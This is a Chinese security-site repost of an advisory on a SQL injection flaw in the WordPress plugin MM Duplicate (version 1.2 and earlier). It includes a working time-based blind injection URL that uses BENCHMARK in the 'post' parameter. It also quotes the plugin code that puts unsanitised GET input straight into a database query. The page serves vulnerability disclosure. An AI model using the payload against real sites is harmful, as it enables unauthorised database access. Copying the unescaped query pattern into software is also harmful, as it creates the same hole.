WordPress插件MM Duplicate <= 1.2 SQL注射缺陷及修复-自学php网

WordPress插件MM Duplicate <= 1.2 SQL注射缺陷及修复

来源：自学PHP网时间：2015-04-17 14:47 作者：阅读:次

[导读] 标题: WordPress MM Duplicate plugin = 1.2 SQL Injection Vulnerability作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm www.2cto.com)下载地址: http://downloads.wordpre......

标题: WordPress MM Duplicate plugin <= 1.2 SQL Injection Vulnerability
作者: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm www.2cto.com)
下载地址: http://downloads.wordpress.org/plugin/mm-duplicate.zip
测试版本: 1.2 (已测)

---
测试方法
---
http://www.2cto.com /index.php?duplicate=1&post=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

---------------
缺陷代码分析
---------------
class mm_duplicate_pages_posts
{
    ...
    function mm_duplicate_pages_posts()
    {
        ...
        add_action('init', array(&$this, 'dup'));
        ...
    }

    function dup()
    {
        if($_GET['duplicate'])
        {
            $id = $_GET['post'];
            $dup = new mm_duplicate();
            ...
            $dup->duplicate_post_page($id);
        }
    }
...
}

class mm_duplicate
{
    function duplicate_post_page($id)
    {
        ...
        $select = "select * from ".$wpdb->prefix."postmeta where post_id = $id";
        ...
    }
...
}

修复：过滤

Redlab CMS多重sql注射缺陷及修复 - 网站安全 - 自学

WordPress的3.2.1核心模块post-template.php XSS漏洞及修复

子栏目

WordPress插件MM Duplicate <= 1.2 SQL注射缺陷及修复

最新评论

添加评论

更多文章推荐

添加评论